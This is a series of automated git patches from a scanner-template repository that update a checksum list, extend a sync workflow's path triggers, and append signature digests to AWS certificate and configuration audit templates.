00:00:00 2001 From: GitHub Action Date: Thu, 11 Apr 2024 14:23:42 +0000 Subject: [PATCH 0042/1768] Auto Generated Templates Checksum [Thu Apr 11 14:23:42 UTC 2024] :robot: --- templates-checksum.txt | 110 +++++++++++++++++++++++++++++++++++++---- 1 file changed, 100 insertions(+), 10 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 94660aafd1..635ff77254 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7,15 +7,104 @@ README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 TEMPLATES-STATS.json:871c8ecf0669b5b5d0805f13ec0262292d8b6d18 TEMPLATES-STATS.md:5233bda44efdfd1fc914d59f8fd0b9cfc93c6414 TOP-10.md:9fa0b88c35245bd492329ce0a6a93add476a5a47 -cloud/enum/aws-app-enum.yaml:26d0dcf57c7ba8003940ed1d53a62971564b2018 +cloud/aws/acm/acm-cert-expired.yaml:12e275cd727bba9f791705d725fc4d1e52182d11 +cloud/aws/acm/acm-cert-renewal-30days.yaml:1352e153777b6f8174811f4b9aead50fe2695a77 +cloud/aws/acm/acm-cert-renewal-45days.yaml:bc0e7c9bf598ffc3c9d7471e75df96dbde2fd14d +cloud/aws/acm/acm-cert-validation.yaml:fa051e4a0b73f6499af8fc1276d2199183b7de00 +cloud/aws/acm/acm-wildcard-cert.yaml:b46b687fb561a97901a52406e0e22bb000515c7a +cloud/aws/aws-code-env.yaml:d710b261eb3073145ce01e422ae0f9182385cfa9 +cloud/aws/cloudtrail/cloudtrail-data-events.yaml:61d510fc941a748218eb0bb78b77b1c0bc4a972a +cloud/aws/cloudtrail/cloudtrail-disabled.yaml:e359c8ab5026da6b93e93230fac14e69823f174b +cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml:39136bb61b2f084fdeb44a5e931ca5d76dd30102 +cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml:6f71d1bc248dbef68fd3aa890d88ceed3c4fc3a2 +cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml:5ce846f06cb759b964ac0e43b5298c6d361a9723 +cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml:8efe76148f14127d25545a7da881226ac135e08b +cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:8b27be33263241f170a371e6e77dc5d79d7bc2f2 +cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml:c5fd3835d7fc5707e45bfd489ef54027597a670d +cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml:92b445b32d8b58d7d1e934ddf7b6839712da5ffb +cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml:ebb18af8edd94205486cb56100753413a8545851 +cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml:64265da425decfab898aaa8fe74f036a57aff591 +cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml:cd932e8a2ec886f022c7fa5586f0c5643eb02cdb +cloud/aws/cloudwatch/cw-alarm-action-set.yaml:def287556f6a8d241bfa030d358ddfe2d2841223 +cloud/aws/cloudwatch/cw-alarms-actions.yaml:43a1f4d02fdedc624e120c65e02237aff194cb80 +cloud/aws/ec2/ec2-imdsv2.yaml:a5c31c001ad0b1368aec28305fa39a462735ba78 +cloud/aws/ec2/ec2-public-ip.yaml:4fb38773cdb6be12a066b805230d0d0d66d92d2e +cloud/aws/ec2/ec2-sg-egress-open.yaml:e8cad48c16399176967580509025eff311a04660 +cloud/aws/ec2/ec2-sg-ingress.yaml:04d0c58198fc64f40b296cbee9431d5f825898f3 +cloud/aws/ec2/ec2-unrestricted-cifs.yaml:3ac0137774789879d594522af81b950d45346e46 +cloud/aws/ec2/ec2-unrestricted-dns.yaml:e85f5e12cacd03aef746be046e300965c00c55a0 +cloud/aws/ec2/ec2-unrestricted-ftp.yaml:6721a5a7d9f6dbd25b8bb9687598f750521ad843 +cloud/aws/ec2/ec2-unrestricted-http.yaml:2ce2bd62f138c0c219d75706ef8715f3d8e55442 +cloud/aws/ec2/ec2-unrestricted-https.yaml:6f1e3f4929c57208a2fdf0e0132e5b05a00c98a9 +cloud/aws/ec2/ec2-unrestricted-icmp.yaml:c6b2185195af30a2970f18f3995bd1bdf308aa86 +cloud/aws/ec2/ec2-unrestricted-memcached.yaml:77f5706a7d083d530663ca7832e2f0a4bd72ffa8 +cloud/aws/ec2/ec2-unrestricted-mongodb.yaml:3be4f2a5acd2e6d762a0b1d805d69186138eac9c +cloud/aws/ec2/ec2-unrestricted-mssql.yaml:a2ff7df3965b4d55654f5a27911031da00e916dd +cloud/aws/ec2/ec2-unrestricted-mysql.yaml:cd0755920deb9b4b57f381cd052e492443f5e989 +cloud/aws/ec2/ec2-unrestricted-netbios.yaml:cecf5b775a8f587fe8f0a762242b1e2b6ed5e692 +cloud/aws/ec2/ec2-unrestricted-opensearch.yaml:5de6c18696849db4d04e092b564fd3a0ecc101c2 +cloud/aws/ec2/ec2-unrestricted-oracle.yaml:4a6242b67eb867653dd733b684e1e60e341b82c2 +cloud/aws/ec2/ec2-unrestricted-pgsql.yaml:566fbd24c670edbbff7ac6c8039bf3ad769486ac +cloud/aws/ec2/ec2-unrestricted-rdp.yaml:0593a520daa4ec2f82bc5c261b398b8787f6295e +cloud/aws/ec2/ec2-unrestricted-redis.yaml:02da2ac4999a095297a454ef03ab02afa95a0930 +cloud/aws/ec2/ec2-unrestricted-smtp.yaml:a7429d56ea3619eac45d1470cd4788726b2cb259 +cloud/aws/ec2/ec2-unrestricted-ssh.yaml:a1b144b3576cdb29cdda749e616130e084e35f9b +cloud/aws/ec2/ec2-unrestricted-telnet.yaml:04c878646b18c6dd5e92f32c3955accd2fbef0ae +cloud/aws/ec2/publicly-shared-ami.yaml:2fcebb823e956f5ff7f30a5899c1fb6b5460d7e0 +cloud/aws/ec2/unencrypted-aws-ami.yaml:e341f420f029d37e97f5957aaae219467c83b870 +cloud/aws/iam/iam-access-analyzer.yaml:2febbd9f72f5483bb7a8f2fc7d85c7354da919a7 +cloud/aws/iam/iam-expired-ssl.yaml:c836a639a4d9f446293fe65c4c5b157fc502ec8d +cloud/aws/iam/iam-full-admin-privileges.yaml:ceb406cd832ca3a3b5afbb58c846390162b4fae5 +cloud/aws/iam/iam-key-rotation-90days.yaml:bc39146f138a821f7de458a30553541aec3bbf39 +cloud/aws/iam/iam-mfa-enable.yaml:0a6c35888c629cbad01c5e5e7e04eab92bffa6ea +cloud/aws/iam/iam-password-policy.yaml:8279cb55e5195c5ebd717c89f27d25e8b4327302 +cloud/aws/iam/iam-root-mfa.yaml:798752274ff9964961ac647906497dbcc4505aad +cloud/aws/iam/iam-ssh-keys-rotation.yaml:80a262969239d7efa462adea360156ed59b77c9b +cloud/aws/iam/iam-unapproved-policy.yaml:d2ffab2fb0dfc4e1af85c5465f98e3c8eac1fbaf +cloud/aws/iam/iam-user-password-change.yaml:2a381f0499fa8c89656aac939b61acdd11e8eb1c +cloud/aws/iam/ssl-cert-renewal.yaml:2ed7722671084aab03c742b68475ce16a7a96484 +cloud/aws/rds/aurora-copy-tags-snap.yaml:2110bbdb4f0de1d0e3718657de3fdc7c0e9a1109 +cloud/aws/rds/aurora-delete-protect.yaml:a9eb733cb1cdb4e07ed06e5bfc0a4a2df450bfd9 +cloud/aws/rds/iam-db-auth.yaml:37cefaa7c44d8c50ef6c6957abd673cc115d10d5 +cloud/aws/rds/rds-backup-enable.yaml:3c85e156129947c42e69ae8fe601e1026246f6c9 +cloud/aws/rds/rds-deletion-protection.yaml:b4f839b97c6693a3f8a3a8b5560e3ad7412cef21 +cloud/aws/rds/rds-encryption-check.yaml:b0eb1992d627f797057aed00ec5c226b6949c5d5 +cloud/aws/rds/rds-event-notify.yaml:339783b59d708d8ae00eca2a16cfdd1e99f9ab48 +cloud/aws/rds/rds-event-sub-enable.yaml:e91cc96f53a4f0d2d6573a0b3a41ee6d49e9aa2d +cloud/aws/rds/rds-event-sub.yaml:189bc0618ac15c3bb0664440faf5180f9431958a +cloud/aws/rds/rds-gp-ssd-usage.yaml:2d269a5a8c87e6854da558950e9435630654e244 +cloud/aws/rds/rds-public-snapshot.yaml:e4c2a324e72dd9cd72d9201d757f3eed7223a125 +cloud/aws/rds/rds-public-subnet.yaml:adbb20aabfed8a753a00632689a240c03e8cd020 +cloud/aws/rds/rds-ri-payment-fail.yaml:19ebf1299ee12a88a061b445cfba6c03e9f044ed +cloud/aws/rds/rds-snapshot-encryption.yaml:4448aa27aeca2be101f93a4e7a9023f06ecce651 +cloud/aws/s3/s3-access-logging.yaml:19d5013388f1d4781306c7e47d541af79d73381f +cloud/aws/s3/s3-auth-fullcontrol.yaml:4014f2e289f1dcbf01d375353c4f1c1989ce8b94 +cloud/aws/s3/s3-bucket-key.yaml:d4da38370c0e40719da8ca9aa301a419ba23d295 +cloud/aws/s3/s3-bucket-policy-public-access.yaml:b4a26fde262094bcaa384cff667ed9c3aae3e205 +cloud/aws/s3/s3-mfa-delete-check.yaml:5983fc34760be48fbb866685eddd6e2320b0d247 +cloud/aws/s3/s3-public-read-acp.yaml:62544635240f00bc7ace0ac4dbd6de7d0381d609 +cloud/aws/s3/s3-public-read.yaml:2a7aeb01d2763be92763c39cce1b80710248462e +cloud/aws/s3/s3-public-write-acp.yaml:efafd212c0b75c0da6c54aa72510efaaff4c53cb +cloud/aws/s3/s3-public-write.yaml:cee70dd8a93169b3fc7b6a82ed37fc3da14bffe7 +cloud/aws/s3/s3-server-side-encryption.yaml:dc60e48d675a3c1c76dd45c70d704a1e9910b526 +cloud/aws/s3/s3-versioning.yaml:3133440829b4ad9d9b1fb886a92dddc52be83cea +cloud/aws/vpc/nacl-open-inbound.yaml:980f4649de7dc9094526bab9dab0097b7cd40b7d +cloud/aws/vpc/nacl-outbound-restrict.yaml:4e9c1ebe9779bb6bf009d9aeb6f7183767df5583 +cloud/aws/vpc/nat-gateway-usage.yaml:79bac47ea9133e661e8fd081eea1942a0c91b393 +cloud/aws/vpc/unrestricted-admin-ports.yaml:45fa41da051ab0de22d2686cbf89c8b0d46fd7e2 +cloud/aws/vpc/vpc-endpoint-exposed.yaml:8d3cb1e55172b4e9026de18c13cfdcf2f5a895c7 +cloud/aws/vpc/vpc-endpoints-not-deployed.yaml:d9fa33d62bfeba287467547c7e9483c7920e89d2 +cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml:8dfa165e2f46bdc33706f3b3502ebf16d92c283e +cloud/aws/vpc/vpn-tunnel-down.yaml:251082b46098453e492ba6003dc3b1bca385b607 +cloud/enum/aws-app-enum.yaml:61abc31cc0ae208df9ed070e7d238edde3e82f48 cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f -cloud/enum/azure-db-enum.yaml:3d29a3c86288356d862922ef0527de99187bf734 -cloud/enum/azure-vm-cloud-enum.yaml:6d9043c907009b2ff6afc6cd09bd35a6d27f6fe9 -cloud/enum/azure-website-enum.yaml:037397591c799d32eb8abc94a346ff0805d68204 -cloud/enum/gcp-app-engine-enum.yaml:b22ff0601a3f7f6ddc39e39ab9dc34410d213e41 -cloud/enum/gcp-bucket-enum.yaml:896300c26517adf67feb80304f5edb25590a03c4 -cloud/enum/gcp-firebase-app-enum.yaml:a36c4fefc09c86eed490307663012e87e9ef2f1e -cloud/enum/gcp-firebase-rtdb-enum.yaml:dc50ea5960f35d0e43edc1a6503d42e5e7b2502a +cloud/enum/azure-db-enum.yaml:1a84da310edfa148667be811a8f749b93a263d0a +cloud/enum/azure-vm-cloud-enum.yaml:a038ac248602f1d51b6c2d5a11da8db087537ee1 +cloud/enum/azure-website-enum.yaml:02e3fbd067ec765f0d87e069624d68b802323137 +cloud/enum/gcp-app-engine-enum.yaml:735d4025743533df111b8bee9132eb2503019b92 +cloud/enum/gcp-bucket-enum.yaml:954d5a61d8cceec64101392998396f4c48cb94c4 +cloud/enum/gcp-firebase-app-enum.yaml:3fd3b413096838d123d31f2a7e3ccb02bc74dd73 +cloud/enum/gcp-firebase-rtdb-enum.yaml:4bd510aa205a80e5b9db5572b16b90949d898842 code/cves/2019/CVE-2019-14287.yaml:8a283265f4e93eeaee636811db34328f70ed1023 code/cves/2021/CVE-2021-3156.yaml:87cee025b7ef9519c1b7c7e845cf6465cb9a9ae1 code/cves/2023/CVE-2023-2640.yaml:2c9f53847e7a7188de0d463c49cd4eb4581a937d @@ -3899,7 +3988,7 @@ http/exposed-panels/minio-console.yaml:849ad2f0bd7fb6c68599bbe9290229c5917eeb26 http/exposed-panels/misp-panel.yaml:b9a52b0035d57ced9ca7f769b976fc6f88b3a011 http/exposed-panels/mitel-micollab-panel.yaml:240a8681b74e96a23f60e0c9ec97a398253803fa http/exposed-panels/mitel-panel-detect.yaml:b07997d5b9e108aa1acc65b2700d15fd901773d1 -http/exposed-panels/mitric-checker-panel.yaml:01c80a63a0a37f21a0a5dde90f9b042c44596206 +http/exposed-panels/mitric-checker-panel.yaml:340dc25b45b7a2a796604c2b7950a6aa748e94af http/exposed-panels/mobile-management-panel.yaml:6a67938c36dfecf8ab566400b9459f118277ffdc http/exposed-panels/mobileiron-login.yaml:2795a03e2aa407d6aa2620bd859309587cacbe6f http/exposed-panels/mobileiron-sentry.yaml:758f0250a4d05db4ea0b55ef09cee2f613f4842f @@ -8273,6 +8362,7 @@ network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740 network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37 profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33 +profiles/aws-cloud-config.yml:35d9feaf76e79bf9b83a33f0f95803a8cc97a9cc profiles/bugbounty.yml:05aaced1241dba5b3c3b37559269b1cae473f52f profiles/cloud.yml:454e596d8ca3f19213b148f6c54c20806cb87a8e profiles/compliance.yml:367b57e7e900f92bc8d9e5883e635e975da0cae9 @@ -8308,7 +8398,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e59218e243ba1c39662833810593fef8dc4b2350 +templates-checksum.txt:386dc69e1aa09c8b4730de162313199553be014b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7509c285988e3e37f648112284d42c924e992513 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 11 Apr 2024 14:24:10 +0000 Subject: [PATCH 0043/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 89 ++++++++++++++++++++++++++++ 1 file changed, 89 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ce39531cc1..73ef158280 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,95 @@ on: push: paths: - '.new-additions' + - 'cloud/aws/acm/acm-cert-expired.yaml' + - 'cloud/aws/acm/acm-cert-renewal-30days.yaml' + - 'cloud/aws/acm/acm-cert-renewal-45days.yaml' + - 'cloud/aws/acm/acm-cert-validation.yaml' + - 'cloud/aws/acm/acm-wildcard-cert.yaml' + - 'cloud/aws/aws-code-env.yaml' + - 'cloud/aws/cloudtrail/cloudtrail-data-events.yaml' + - 'cloud/aws/cloudtrail/cloudtrail-disabled.yaml' + - 'cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml' + - 'cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml' + - 'cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml' + - 'cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml' + - 'cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml' + - 'cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml' + - 'cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml' + - 'cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml' + - 'cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml' + - 'cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml' + - 'cloud/aws/cloudwatch/cw-alarm-action-set.yaml' + - 'cloud/aws/cloudwatch/cw-alarms-actions.yaml' + - 'cloud/aws/ec2/ec2-imdsv2.yaml' + - 'cloud/aws/ec2/ec2-public-ip.yaml' + - 'cloud/aws/ec2/ec2-sg-egress-open.yaml' + - 'cloud/aws/ec2/ec2-sg-ingress.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-cifs.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-dns.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-ftp.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-http.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-https.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-icmp.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-memcached.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-mongodb.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-mssql.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-mysql.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-netbios.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-opensearch.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-oracle.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-pgsql.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-rdp.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-redis.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-smtp.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-ssh.yaml' + - 'cloud/aws/ec2/ec2-unrestricted-telnet.yaml' + - 'cloud/aws/ec2/publicly-shared-ami.yaml' + - 'cloud/aws/ec2/unencrypted-aws-ami.yaml' + - 'cloud/aws/iam/iam-access-analyzer.yaml' + - 'cloud/aws/iam/iam-expired-ssl.yaml' + - 'cloud/aws/iam/iam-full-admin-privileges.yaml' + - 'cloud/aws/iam/iam-key-rotation-90days.yaml' + - 'cloud/aws/iam/iam-mfa-enable.yaml' + - 'cloud/aws/iam/iam-password-policy.yaml' + - 'cloud/aws/iam/iam-root-mfa.yaml' + - 'cloud/aws/iam/iam-ssh-keys-rotation.yaml' + - 'cloud/aws/iam/iam-unapproved-policy.yaml' + - 'cloud/aws/iam/iam-user-password-change.yaml' + - 'cloud/aws/iam/ssl-cert-renewal.yaml' + - 'cloud/aws/rds/aurora-copy-tags-snap.yaml' + - 'cloud/aws/rds/aurora-delete-protect.yaml' + - 'cloud/aws/rds/iam-db-auth.yaml' + - 'cloud/aws/rds/rds-backup-enable.yaml' + - 'cloud/aws/rds/rds-deletion-protection.yaml' + - 'cloud/aws/rds/rds-encryption-check.yaml' + - 'cloud/aws/rds/rds-event-notify.yaml' + - 'cloud/aws/rds/rds-event-sub-enable.yaml' + - 'cloud/aws/rds/rds-event-sub.yaml' + - 'cloud/aws/rds/rds-gp-ssd-usage.yaml' + - 'cloud/aws/rds/rds-public-snapshot.yaml' + - 'cloud/aws/rds/rds-public-subnet.yaml' + - 'cloud/aws/rds/rds-ri-payment-fail.yaml' + - 'cloud/aws/rds/rds-snapshot-encryption.yaml' + - 'cloud/aws/s3/s3-access-logging.yaml' + - 'cloud/aws/s3/s3-auth-fullcontrol.yaml' + - 'cloud/aws/s3/s3-bucket-key.yaml' + - 'cloud/aws/s3/s3-bucket-policy-public-access.yaml' + - 'cloud/aws/s3/s3-mfa-delete-check.yaml' + - 'cloud/aws/s3/s3-public-read-acp.yaml' + - 'cloud/aws/s3/s3-public-read.yaml' + - 'cloud/aws/s3/s3-public-write-acp.yaml' + - 'cloud/aws/s3/s3-public-write.yaml' + - 'cloud/aws/s3/s3-server-side-encryption.yaml' + - 'cloud/aws/s3/s3-versioning.yaml' + - 'cloud/aws/vpc/nacl-open-inbound.yaml' + - 'cloud/aws/vpc/nacl-outbound-restrict.yaml' + - 'cloud/aws/vpc/nat-gateway-usage.yaml' + - 'cloud/aws/vpc/unrestricted-admin-ports.yaml' + - 'cloud/aws/vpc/vpc-endpoint-exposed.yaml' + - 'cloud/aws/vpc/vpc-endpoints-not-deployed.yaml' + - 'cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml' + - 'cloud/aws/vpc/vpn-tunnel-down.yaml' - 'code/cves/2024/CVE-2024-3094.yaml' - 'http/cves/2022/CVE-2022-0424.yaml' - 'http/cves/2024/CVE-2024-0337.yaml' From 16266cb3dcd85ac7a1155f83971eeb50f8dae0e6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Apr 2024 14:25:25 +0000 Subject: [PATCH 0044/1768] Auto Template Signing [Thu Apr 11 14:25:25 UTC 2024] :robot: --- cloud/aws/acm/acm-cert-expired.yaml | 1 + cloud/aws/acm/acm-cert-renewal-30days.yaml | 1 + cloud/aws/acm/acm-cert-renewal-45days.yaml | 1 + cloud/aws/acm/acm-cert-validation.yaml | 1 + cloud/aws/acm/acm-wildcard-cert.yaml | 1 + cloud/aws/aws-code-env.yaml | 1 + cloud/aws/cloudtrail/cloudtrail-data-events.yaml | 1 + cloud/aws/cloudtrail/cloudtrail-disabled.yaml | 1 + cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml | 1 + cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml | 1 + cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml | 1 + cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml | 1 + cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml | 1 + cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml | 1 + cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml | 1 + cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml | 1 + cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml | 1 + cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml | 1 + cloud/aws/cloudwatch/cw-alarm-action-set.yaml | 1 + cloud/aws/cloudwatch/cw-alarms-actions.yaml | 1 + cloud/aws/ec2/ec2-imdsv2.yaml | 1 + cloud/aws/ec2/ec2-public-ip.yaml | 1 + cloud/aws/ec2/ec2-sg-egress-open.yaml | 1 + cloud/aws/ec2/ec2-sg-ingress.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-cifs.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-dns.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-ftp.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-http.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-https.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-icmp.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-memcached.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-mongodb.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-mssql.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-mysql.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-netbios.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-opensearch.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-oracle.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-pgsql.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-rdp.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-redis.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-smtp.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-ssh.yaml | 1 + cloud/aws/ec2/ec2-unrestricted-telnet.yaml | 1 + cloud/aws/ec2/publicly-shared-ami.yaml | 1 + cloud/aws/ec2/unencrypted-aws-ami.yaml | 1 + cloud/aws/iam/iam-access-analyzer.yaml | 1 + cloud/aws/iam/iam-expired-ssl.yaml | 1 + cloud/aws/iam/iam-full-admin-privileges.yaml | 1 + cloud/aws/iam/iam-key-rotation-90days.yaml | 1 + cloud/aws/iam/iam-mfa-enable.yaml | 1 + cloud/aws/iam/iam-password-policy.yaml | 1 + cloud/aws/iam/iam-root-mfa.yaml | 1 + cloud/aws/iam/iam-ssh-keys-rotation.yaml | 1 + cloud/aws/iam/iam-unapproved-policy.yaml | 1 + cloud/aws/iam/iam-user-password-change.yaml | 1 + cloud/aws/iam/ssl-cert-renewal.yaml | 1 + cloud/aws/rds/aurora-copy-tags-snap.yaml | 1 + cloud/aws/rds/aurora-delete-protect.yaml | 1 + cloud/aws/rds/iam-db-auth.yaml | 1 + cloud/aws/rds/rds-backup-enable.yaml | 1 + cloud/aws/rds/rds-deletion-protection.yaml | 1 + cloud/aws/rds/rds-encryption-check.yaml | 1 + cloud/aws/rds/rds-event-notify.yaml | 1 + cloud/aws/rds/rds-event-sub-enable.yaml | 1 + cloud/aws/rds/rds-event-sub.yaml | 1 + cloud/aws/rds/rds-gp-ssd-usage.yaml | 1 + cloud/aws/rds/rds-public-snapshot.yaml | 1 + cloud/aws/rds/rds-public-subnet.yaml | 1 + cloud/aws/rds/rds-ri-payment-fail.yaml | 1 + cloud/aws/rds/rds-snapshot-encryption.yaml | 1 + cloud/aws/s3/s3-access-logging.yaml | 1 + cloud/aws/s3/s3-auth-fullcontrol.yaml | 1 + cloud/aws/s3/s3-bucket-key.yaml | 1 + cloud/aws/s3/s3-bucket-policy-public-access.yaml | 1 + cloud/aws/s3/s3-mfa-delete-check.yaml | 1 + cloud/aws/s3/s3-public-read-acp.yaml | 1 + cloud/aws/s3/s3-public-read.yaml | 1 + cloud/aws/s3/s3-public-write-acp.yaml | 1 + cloud/aws/s3/s3-public-write.yaml | 1 + cloud/aws/s3/s3-server-side-encryption.yaml | 1 + cloud/aws/s3/s3-versioning.yaml | 1 + cloud/aws/vpc/nacl-open-inbound.yaml | 1 + cloud/aws/vpc/nacl-outbound-restrict.yaml | 1 + cloud/aws/vpc/nat-gateway-usage.yaml | 1 + cloud/aws/vpc/unrestricted-admin-ports.yaml | 1 + cloud/aws/vpc/vpc-endpoint-exposed.yaml | 1 + cloud/aws/vpc/vpc-endpoints-not-deployed.yaml | 1 + cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml | 1 + cloud/aws/vpc/vpn-tunnel-down.yaml | 1 + 89 files changed, 89 insertions(+) diff --git a/cloud/aws/acm/acm-cert-expired.yaml b/cloud/aws/acm/acm-cert-expired.yaml index 734e12a553..25a7ffafbc 100644 --- a/cloud/aws/acm/acm-cert-expired.yaml +++ b/cloud/aws/acm/acm-cert-expired.yaml @@ -38,3 +38,4 @@ code: - type: dsl dsl: - 'region + " AWS region have expired SSL/TLS certificates"' +# digest: 490a00463044022020875df0814bb41d33d015a50a6a2d23309be5b695bad8ba9840f77e139f719b02205052abd88786969a3d7dcc2594b881841f82308df082a71df3b221085d1e9ceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/acm/acm-cert-renewal-30days.yaml b/cloud/aws/acm/acm-cert-renewal-30days.yaml index 3b02e989f3..3cae97828a 100644 --- a/cloud/aws/acm/acm-cert-renewal-30days.yaml +++ b/cloud/aws/acm/acm-cert-renewal-30days.yaml @@ -54,3 +54,4 @@ code: - type: dsl dsl: - '"The AWS ACM Certificate " + certificate +" is about to expire in 30 days"' +# digest: 4a0a004730450220756b5be6dcc7136b4b633c69403bc8a7d096c35c2a8275b99855b974e5c6ddd102210097de27a237f011112a45966e4320e15b0b9ee2af6762bd66817106963c31b0d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/acm/acm-cert-renewal-45days.yaml b/cloud/aws/acm/acm-cert-renewal-45days.yaml index 383b5c9cc3..ea8a5647a5 100644 --- a/cloud/aws/acm/acm-cert-renewal-45days.yaml +++ b/cloud/aws/acm/acm-cert-renewal-45days.yaml @@ -54,3 +54,4 @@ code: - type: dsl dsl: - '"The AWS ACM Certificate " + certificate +" is about to expire in 30 days"' +# digest: 490a00463044022030b5597eb0c060a9e40e23a74f07216222b2df8f53391b091624a8fb3a5fc7b8022007201e8fa3b8699eed20222e46d207fb8b271fbc1c20092e96bb5a2d3740a5d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/acm/acm-cert-validation.yaml b/cloud/aws/acm/acm-cert-validation.yaml index f9f60579b3..b66e346a02 100644 --- a/cloud/aws/acm/acm-cert-validation.yaml +++ b/cloud/aws/acm/acm-cert-validation.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"The issue/renewal request for " + certificatearn + " SSL/TLS certificate was not validated"' +# digest: 4a0a0047304502210089639de3f7c36e53216707ebb4296d7ca7744e1227c45977772e3a5a2fa492e2022032c5f3a8a70224d2aad87a042558ad554bc58170e274510715cca40dc0e67ec3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/acm/acm-wildcard-cert.yaml b/cloud/aws/acm/acm-wildcard-cert.yaml index 0b7aaa37cc..ef6e896265 100644 --- a/cloud/aws/acm/acm-wildcard-cert.yaml +++ b/cloud/aws/acm/acm-wildcard-cert.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - 'certificatearn + " AWS ACM certificate is a wildcard certificate"' +# digest: 4a0a00473045022100f6ea9830b40920522f8151d891ae384572efefa30076cbf061bb313303abe50d022030dcf2a11227f66c51c43294228e264bf6b0eee1ae359cc2b84272c834de6351:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff 